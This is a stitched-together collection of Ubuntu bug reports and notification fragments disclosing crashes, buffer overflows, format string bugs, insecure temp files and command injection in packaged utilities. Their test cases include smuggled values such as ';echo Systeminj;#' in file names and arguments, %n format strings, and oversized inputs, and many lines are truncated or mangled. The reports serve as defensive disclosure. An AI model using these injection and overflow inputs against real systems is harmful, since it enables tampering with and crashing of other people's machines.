Yes, if some other program (GUI, server-side scripts, etc.)
uses user-supplied data as input to the mysqld_multi command in vulnerable
operations, it will be a security issue.
--
You received this bug notification because you are a member of Ubuntu
Server Team, which is subscribed to mysql-5.1
It happened in: Ubuntu 10.04.4 LTS.
--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/792637
Title:
dialog Segmentation fault
To manage notifications about this bug go to:
Public bug reported:
Binary package hint: samba-doc
samba-doc/examples/scripts/eventlog/parselog.pl has a format string bug.
Test case:
emanuel@amd64 /tmpecho '1 1 1 %n' | perl
/usr/share/doc/samba-doc/examples/scripts/eventlog/parselog.pl
Modification of a read-only value attempted at
Public bug reported:
Binary package hint: python-ubuntuone-client
ubuntuone-client/ubuntuone/syncdaemon/fsm/fsm_draw.py creates a temporary
file with the fixed name graph.debug under /tmp.
Test case:
emanuel@emanuel-desktop:~$ export PYTHONPATH=/usr/share/xdot/
emanuel@emanuel-desktop:~$ python
Public bug reported:
Binary package hint: system-config-printer-gnome
system-config-printer/asyncpk1.py creates a temporary file with the fixed name
foo under /tmp.
Test case:
1) run python /usr/share/system-config-printer/asyncpk1.py
2) click on Go
3) click on Get file
Result: /tmp/foo created.
Public bug reported:
Binary package hint: vim-runtime
vim/vim73/tools/shtags.pl has a format string bug.
Test case:
emanuel@emanuel-desktop:~$ echo 1 '/tmp/a%n'
emanuel@emanuel-desktop:~$ /usr/share/vim/vim73/tools/shtags.pl '/tmp/a%n'
Modification of a read-only value attempted at
Public bug reported:
Binary package hint: gxmessage
Displaying an extremely long button causes the window manager to crash.
Test case:
emanuel@emanuel-desktop:~$ gxmessage text -buttons `python -c print
'A'*115000`
(gxmessage:8096): Gdk-WARNING **: Native Windows wider or taller than 65535
Public bug reported:
Binary package hint: zenity
Displaying an extremely long error causes the window manager to crash.
If the keyboard doesn't respond, log in on a tty and run compiz.
Test case:
emanuel@emanuel-desktop:~$ zenity --error --text=`python -c print 'A'*115000`
(zenity:8369):
Public bug reported:
Binary package hint: vinagre
Displaying an extremely long error causes the window manager to crash.
If the keyboard doesn't respond, log in on a tty and run compiz.
Test case:
emanuel@emanuel-desktop:~$ vinagre --file=`python -c print 'A'*115000`
(vinagre:8697): Gdk-WARNING
Public bug reported:
Binary package hint: nautilus
Displaying an extremely long error causes the window manager to crash.
Test case:
emanuel@emanuel-desktop:~$ nautilus `python -c print 'A'*10`
** Affects: nautilus (Ubuntu)
Importance: Undecided
Status: New
--
You received
Public bug reported:
Binary package hint: pitivi
Displaying an extremely long error causes the window manager to crash.
If the keyboard doesn't respond, log in on a tty and run compiz.
Test case:
emanuel@emanuel-desktop:~$ pitivi `python -c print 'A'*10`
Public bug reported:
Binary package hint: gcalctool
/usr/bin/gnome-calculator crashes with a Segmentation fault message and
throws errors when it gets long input.
Test case:
emanuel@emanuel-desktop:~$ gcalctool -s `python -c print 'A'*4`
gcalctool: malloc.c:3096: sYSMALLOc: Assertion `(old_top ==
Public bug reported:
Binary package hint: x11-utils
xmessage is unable to handle long input and crashes with an X error.
Test case:
1 )
emanuel@emanuel-desktop:/tmp$ /usr/bin/xmessage 'text' -buttons `python -c
print 'A'*10`
X Error of failed request: BadAlloc (insufficient resources for
Public bug reported:
Binary package hint: binfmt-support
/usr/sbin/update-binfmts crashes with a Segmentation fault message when it
gets invalid input for the display parameter (not cli\wine\jar\python2.7).
Test case:
emanuel@emanuel-desktop:/tmp$ /usr/sbin/update-binfmts --display sometext
sometext
Public bug reported:
Binary package hint: x11-xserver-utils
/usr/bin/xhost crashes with a very long hostname parameter.
Test case:
emanuel@emanuel-desktop:/tmp$ xhost SI:`python -c print 'A'*1`:`python -c
print 'A'*1`
*** glibc detected *** xhost: double free or corruption (out):
Public bug reported:
Binary package hint: dialog
dialog crashes with long input to the yesno and msgbox options.
Test case:
1 ) dialog --yesno `python -c print 'A'*10` 50 50
2 ) dialog --msgbox `python -c print 'A'*10` 50 50
Under GDB:
Starting program: /usr/bin/dialog --msgbox `python -c
Public bug reported:
Binary package hint: x11-apps
When /usr/bin/xcutsel gets 83 characters or more from the -selection option,
it crashes with buffer overflow detected.
Test case:
emanuel@emanuel-desktop:/tmp$ xcutsel -selection `python -c print 'A'*1`
*** buffer overflow detected ***: xcutsel
Public bug reported:
Binary package hint: scite
There is a buffer overflow when the filename parameter is more than 4096
characters.
Test case:
emanuel@emanuel-desktop:~$ scite `python -c print 'A'*5000`
*** buffer overflow detected ***: scite terminated
Tested on versions:
2.26, 2.03
**
Public bug reported:
Binary package hint: gconf-editor
/usr/bin/gconf-editor crashes with a Segmentation fault message.
Test case:
emanuel@emanuel-desktop:~$ gconf-editor /A
Segmentation fault
Under GDB:
Starting program: /usr/bin/gconf-editor /A
[Thread debugging using libthread_db enabled]
mysql-client-5.1 package version : 5.1.41-3ubuntu12.10
--
You received this bug notification because you are a member of Ubuntu
Server Team, which is subscribed to mysql-5.1 in Ubuntu.
https://bugs.launchpad.net/bugs/781982
Title:
Format string bug in mysqldumpslow
--
Ubuntu-server-bugs
mysql-server-5.1 package version : 5.1.41-3ubuntu12.10
--
You received this bug notification because you are a member of Ubuntu
Server Team, which is subscribed to mysql-5.1 in Ubuntu.
https://bugs.launchpad.net/bugs/781985
Title:
Format string bugs in mysqlhotcopy
--
Ubuntu-server-bugs
Public bug reported:
Binary package hint: foo2zjs
When /usr/bin/hipercdecode gets 11 characters or more from input (file or stdin),
it crashes with the following message:
buffer overflow detected.
Test case:
emanuel@emanuel-desktop:/tmp$ echo AAA /tmp/11
emanuel@emanuel-desktop:/tmp$
*** This bug is a security vulnerability ***
Public security bug reported:
Binary package hint: foomatic-db-engine
/usr/bin/foomatic-combo-xml writes data given by parameters to a fixed
char[1024] with sprintf, which can trigger a buffer overflow.
Test case:
emanuel@emanuel-desktop:/tmp$
Public bug reported:
Binary package hint: intel-gpu-tools
I get a Segmentation fault when executing one of the intel_upload_blit_* commands as
a regular user and as root.
As root the message is: (instead of Permission denied)
DRM_IOCTL_I915_GEM_APERTURE failed: Invalid argument
Test case:
mysql-client-5.1 package version : 5.1.41-3ubuntu12.10
--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/781982
Title:
Format string bug in mysqldumpslow
--
ubuntu-bugs mailing list
mysql-server-5.1 package version : 5.1.41-3ubuntu12.10
--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/781985
Title:
Format string bugs in mysqlhotcopy
--
ubuntu-bugs mailing list
Public bug reported:
Binary package hint: intel-gpu-tools
/usr/bin/intel_bios_reader crashes when it gets the intel_bios_reader binary
as a parameter.
Test case:
emanuel@emanuel-desktop:/tmp$ md5sum /usr/bin/intel_bios_reader
7277594a2b9588909844115afd36e5ee /usr/bin/intel_bios_reader
Public bug reported:
Binary package hint: xfonts-utils
/usr/bin/fonttosfnt crashes with a Segmentation fault message.
Test case:
emanuel@emanuel-desktop:~$ fonttosfnt -o 1
/usr/share/fonts/truetype/freefont/FreeSans.ttf
Segmentation fault
Under GDB:
(gdb) r -o 1
Public bug reported:
Binary package hint: xfonts-utils
/usr/bin/ucs2any crashes with a Segmentation fault message.
Test case:
emanuel@emanuel-desktop:/tmp$ touch Z
emanuel@emanuel-desktop:/tmp$ cat 2.bdf
STARTFONT 2.1
FONT 1-ISO10646-1
emanuel@emanuel-desktop:/tmp$ ucs2any 2.bdf Z iso8859-1
No
Public bug reported:
Binary package hint: console-setup
/usr/bin/ckbcomp has a command injection bug.
Test case:
root@emanuel-desktop:/tmp# touch /etc/console-setup/compose.a;echo
Systeminj;#.inc /usr/share/consoletrans/a;echo Systeminj;#.acm /tmp/CKB
root@emanuel-desktop:/tmp#
Public bug reported:
Binary package hint: dolphin
/usr/bin/servicemenuinstallation has a command injection bug.
In Ubuntu 10.04 the file exists inside the kdebase-bin package.
In Ubuntu 11.04 the file exists inside the dolphin package.
Test case:
emanuel@emanuel-desktop:/tmp$ touch a
Public bug reported:
Binary package hint: f-spot
The strace option inside /usr/bin/f-spot creates a temporary file with the fixed
name f-spot.strace under /tmp.
Test case:
emanuel@emanuel-desktop:/tmp$ f-spot --strace
emanuel@emanuel-desktop:/tmp$ ls f-spot*
f-spot.strace
The bug can be found at:
elif
Fix:
system("cat", "/etc/console-setup/compose.${charmap}.inc");
--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/782705
Title:
command injection in ckbcomp
--
ubuntu-bugs mailing list
Fix:
system("ucf", "--debconf-ok", "--sum-file",
"/var/lib/libxml-sax-perl/ParserDetails.ini.md5sum", $tmpfile, $file);
--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/782479
Title:
command injection
Public bug reported:
Binary package hint: perl
/usr/bin/h2xs has a format string bug.
Test case:
root@emanuel-desktop:/tmp# chfn -f emanuel-%n emanuel
emanuel@emanuel-desktop:/tmp$ /usr/bin/h2xs wait.h
Defaulting to backwards compatibility with perl 5.10.1
If you intend this module to be
Public bug reported:
Binary package hint: mysql-server-5.1
/usr/bin/mysqld_multi has command injection bugs.
Test case:
emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --example --silent
/tmp/mysqld_multi_example
1 ) report option :
emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi
Public bug reported:
Binary package hint: adduser
/usr/sbin/deluser has a command injection bug.
Test case:
root@emanuel-desktop:/tmp# echo ;echo
SystemInj;1:x:9898:9899:,,,:/home/Sysinj:/bin/bash /etc/passwd
root@emanuel-desktop:/tmp# /usr/sbin/deluser ;echo SystemInj;1
no crontab for root
Public bug reported:
Binary package hint: psfontmgr
/usr/bin/defoma-psfont-installer has a command injection bug.
Test case:
emanuel@emanuel-desktop:/tmp$ touch 123 123';echo Systeminj;echo '1 #
select that file in next command
emanuel@emanuel-desktop:/tmp$ /usr/bin/defoma-psfont-installer
Public bug reported:
Binary package hint: gstreamer0.10-plugins-base-apps
/usr/bin/gst-visualise-0.10 has a command injection bug.
Test case:
1) from first argument ($pipe variable):
emanuel@emanuel-desktop:/tmp$ gst-visualise-0.10 text 2/dev/null ; echo
Systeminj ; #
No configuration file
Public bug reported:
Binary package hint: libxml-sax-perl
/usr/bin/update-perl-sax-parsers has a command injection bug.
Test case:
emanuel@emanuel-desktop:/tmp$ /usr/bin/update-perl-sax-parsers --update --file
2/dev/null ;echo Systeminj;exit; --ucf 1
update-perl-sax-parsers: Updating overall
Public bug reported:
Binary package hint: mysql-client-5.1
/usr/bin/mysqldumpslow has a format string bug.
Test case:
emanuel@emanuel-desktop:/tmp$ cat /tmp/query_slow_log
# User@Host: root[ro%sot] @ localhost []
# Query_time: 20.000941 Lock_time: 0.00 Rows_sent: 1
Public bug reported:
Binary package hint: mysql-server-5.1
/usr/bin/mysqlhotcopy has format string bugs.
Test case:
Connect to the mysql server and execute:
mysql create database test;
Query OK, 1 row affected (0.00 sec)
mysql use test;
Database changed
mysql create table `a%n%n%n%n%n%n` (id
Public bug reported:
Binary package hint: sysvinit
The /usr/sbin/update-rc.d and /usr/sbin/update-rc.d-insserv scripts have
a format string bug.
Test case:
emanuel@emanuel-desktop /tmptouch bug%nf
emanuel@emanuel-desktop /tmpupdate-rc.d ../../tmp/bug%nf start
Modification of a read-only value
Public bug reported:
Binary package hint: adduser
/usr/sbin/deluser has a format string bug.
Test case:
root@emanuel-desktop:/tmp# mkdir %999s
root@emanuel-desktop:/tmp# /tmp/%999s/../../usr/sbin/deluser Bug
Integer overflow in format string for prtf at
Public bug reported:
Binary package hint: syslinux
/usr/bin/ppmtolss16 has a format string bug.
Test case:
emanuel@emanuel-desktop /tmpmkdir %999s
emanuel@emanuel-desktop /tmp/tmp/%999s/../../usr/bin/ppmtolss16
/home/emanuel/Download/lantern.ppm
Integer overflow in
Public bug reported:
Binary package hint: xscreensaver-data
/usr/bin/xscreensaver-text has a format string bug.
Test case:
emanuel@emanuel-desktop:~$ export HOME=/tmp
emanuel@emanuel-desktop:~$ echo *textMode:Format_string_%n_bug
/tmp/.xscreensaver
emanuel@emanuel-desktop:~$
Public bug reported:
Binary package hint: libkolab-perl
/usr/bin/kolab_smtpdpolicy has a format string bug.
Test case:
emanuel@emanuel-desktop:/tmp$ /usr/bin/kolab_smtpdpolicy -ldap Bug%n..
Modification of a read-only value attempted at /usr/bin/kolab_smtpdpolicy line
161, DATA line 353.
Public bug reported:
Binary package hint: apparmor-utils
/usr/sbin/audit, /usr/sbin/autodep and /usr/sbin/enforce have format
string bugs.
Test case:
emanuel@emanuel-desktop:/tmp$ /usr/sbin/audit /tmp/%n
Modification of a read-only value attempted at /usr/sbin/audit line 122.